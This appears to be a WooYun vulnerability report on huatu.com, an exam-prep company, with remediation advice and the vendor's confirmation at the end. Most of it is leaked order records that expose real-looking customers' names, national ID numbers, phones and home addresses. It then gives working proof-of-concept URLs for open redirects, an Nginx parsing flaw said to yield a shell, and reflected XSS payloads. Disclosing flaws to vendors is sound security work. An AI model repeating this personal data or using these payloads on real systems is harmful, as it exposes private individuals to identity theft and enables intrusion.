date:20151220153221
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450596642RN548','399047','1','99.00','0','60.191.246.38','1450596741','1','2','0','99','bm5.huatu.com','18705899883');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('639457','S-P1450596642RN548','399047','2016年浙江省公务员笔试考试辅导课程','99.00','1','GZJSK016888','浙江分校','杭州总部','72','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('399047','S-P1450596642RN548','周锦阳','33078219890517065X','女','18705899883','[email protected]','','在职','','网络','华图网站','浙江省义乌市国际商贸城3区5楼1街29348');
date:20151220153423
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450596370RN751','2317159','1','2080.00','0','118.81.119.174','1450596863','1','2','0','2080','bm5.huatu.com','15934140183');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643409','S-P1450596370RN751','2317159','2015年太原尖草坪招教笔试','2080.00','1','TBTYJS01516','山西分校','太原总部','54','','400','','',2)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2317159','S-P1450596370RN751','王晓丽','140181198706283067','女','15934140183','[email protected]','','在职','','网络','博客','');
date:20151220154152
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450597072RN489','2317171','1','10000.00','0','113.105.134.210','1450597312','1','2','0','10000','bm5.huatu.com','13662786043');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643931','S-P1450597072RN489','2317171','2016年东莞市教师招聘面试导师过关协议班TMSZJS11626','10000.00','1','TMSZJS11626','深圳分校','深圳总部','60','','2000','','',2)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2317171','S-P1450597072RN489','钟雯','44142419920705226X','女','13662786043','[email protected]','','在职','','网络','华图网站','');
date:20151220154435
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450596571RN591','2317163','1','29.00','0','218.76.140.198','1450597475','1','2','0','29','bm5.huatu.com','18627380022');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('630537','S-P1450596571RN591','2317163','2016年湖南省公务员考试笔试娄底七点半课堂GSYSK51606A','29.00','1','GSYSK51606A','邵阳分校','娄底市分部','90','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2317163','S-P1450596571RN591','刘旋','430681199405189318','男','18627380022','[email protected]','','应届','','网络','华图网站','湖南人文科技学院');
date:20151220154622
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450597413RN771','2317183','1','3680.00','0','61.164.149.46','1450597582','1','2','0','3680','bm5.huatu.com','15606970884');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('623870','S-P1450597413RN771','2317183','2016年福建省公务员笔试辅导课程','3680.00','1','GFZSK11602','福州分校','莆田分部','120','','1300','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2317183','S-P1450597413RN771','徐芳菲','35030219940102002X','女','15606970884','[email protected]','','应届','','其它','朋友推荐','');
date:20151220154625
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450597373RN959','2317184','1','980.00','0','219.147.0.10','1450597585','1','2','0','980','bm5.huatu.com','13954236920');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('644273','S-P1450597373RN959','2317184','2015年青岛市国家海洋局面试辅导课程系统精讲班MQDSY01539','980.00','1','MQDSY01539','青岛分校','青岛总部','20','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2317184','S-P1450597373RN959','张晓语','370785199108011227','女','13954236920','[email protected]','','应届','','','','');
date:20151220154840
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450597286RN966','2317181','1','99.00','0','183.234.62.104','1450597720','1','2','0','99','bm5.huatu.com','15019237422');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('637777','S-P1450597286RN966','2317181','2016年广州教师招聘笔试 教综精讲网络直播课程','99.00','1','TBGZJS016070','广州分校','广州总部','24','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2317181','S-P1450597286RN966','杨华','410721198904103065','女','15019237422','[email protected]','','在职','','','','');
date:20151220154905
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450597708RN907','2317163','1','29.00','0','218.76.140.198','1450597745','1','2','0','29','bm5.huatu.com','18627380022');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('630537','S-P1450597708RN907','2317163','2016年湖南省公务员考试笔试娄底七点半课堂GSYSK51606A','29.00','1','GSYSK51606A','邵阳分校','娄底市分部','90','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2317163','S-P1450597708RN907','刘旋','430681199405189318','女','18627380022','[email protected]','','应届','','网络','华图网站','湖南人文科技学院');
date:20151220155401
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450597832RN427','2312078','1','99.00','0','101.69.124.204','1450598041','1','2','0','99','bm5.huatu.com','18367811316');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('639457','S-P1450597832RN427','2312078','2016年浙江省公务员笔试考试辅导课程','99.00','1','GZJSK016888','浙江分校','杭州总部','72','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2312078','S-P1450597832RN427','胡潇倩','330724199404281328','女','18367811316','[email protected]','','应届','','网络','QQ','浙江省东阳市歌山镇上宅村诚艺服饰对面');
date:20151220155920
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450597727RN904','2316276','1','4280.00','0','120.32.70.202','1450598360','1','2','0','4280','bm5.huatu.com','15880480915');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('632208','S-P1450597727RN904','2316276','2015年福建省事业单位面试辅导课程','4280.00','1','MFZSY01563','福州分校','福州总部','48','','400','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2316276','S-P1450597727RN904','黄群秀','350423199205254520','女','15880480915','[email protected]','','在职','','网络','华图网站','福州市西洋新村44座308');
date:20151220161447
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450599003RN999','2317224','1','12800.00','0','1.81.195.200','1450599287','1','2','0','11800','bm5.huatu.com','17792183179');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('627570','S-P1450599003RN999','2317224','2016年陕西省公务员考试笔试辅导课程','12800.00','1','GXASK01603A','陕西分校','西安总部','288','','2000','','',2)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2317224','S-P1450599003RN999','赵纬君','612329199112300223','女','17792183179','[email protected]','','其它','','','','');

漏洞证明:

0x02:三处URL跳转:

http://youxue.huatu.com/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D
http://wenku.huatu.com/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D
http://v.huatu.com/htnews/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D


0x03:Nginx解析漏洞(可获取shell):

http://v.huatu.com/robots.txt/a.php
http://ahwx.huatu.com/robots.txt/a.php
http://passport.huatu.com/robots.txt/a.php
http://m.v.huatu.com/public/css/css.css/a.php
http://cps.huatu.com/static/css/css.css/a.php


0x04:XSS:

http://ask.huatu.com/user/ssologin.html?returnUrl=--%3E%27%22%3E%3CH1%3EXSS%3C%2FH1%3E
http://cps.huatu.com/index.php/home/gourl/?url=http%3A%2F%2Fv.huatu.com%2Fanhui%2Fcg%2F&source=--%3E%27%22%3E%3CH1%3EXSS%3C%2FH1%3E&web=web


0x05:.DS_Store文件泄露:

http://tiku.huatu.com/.DS_Store


如图:

2015-12-20_163609.png

修复方案:

我是来找礼物的.
我是来找礼物的.
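我是来找礼物的.

(审阅补充)按上文各项对应的修复建议:
0x01 目录遍历:关闭目录列表(nginx 中 `autoindex off;`),订单记录等数据文件移出Web根目录或禁止直接访问;已暴露的订单数据按数据泄露事件处理,评估影响范围并通知受影响用户。
0x02 URL跳转:download.php 的 link 参数解码后只允许跳转到白名单内的域名,不要直接信任用户传入的地址。
0x03 Nginx解析漏洞:php.ini 中设置 `cgi.fix_pathinfo=0`,或在 nginx 的 PHP location 中先确认被请求的脚本文件真实存在(如 `try_files $uri =404;`)再交给 PHP 处理;静态资源和上传目录禁止执行 PHP。
0x04 XSS:returnUrl、source 等参数输出到页面前做HTML编码,并校验其为合法的站内URL。
0x05 .DS_Store:从站点目录中删除 .DS_Store,并在服务器上禁止访问以点开头的文件。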

版权声明:转载请注明来源 带头大哥@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-12-22 10:16

厂商回复:

感谢 发布

最新状态:

暂无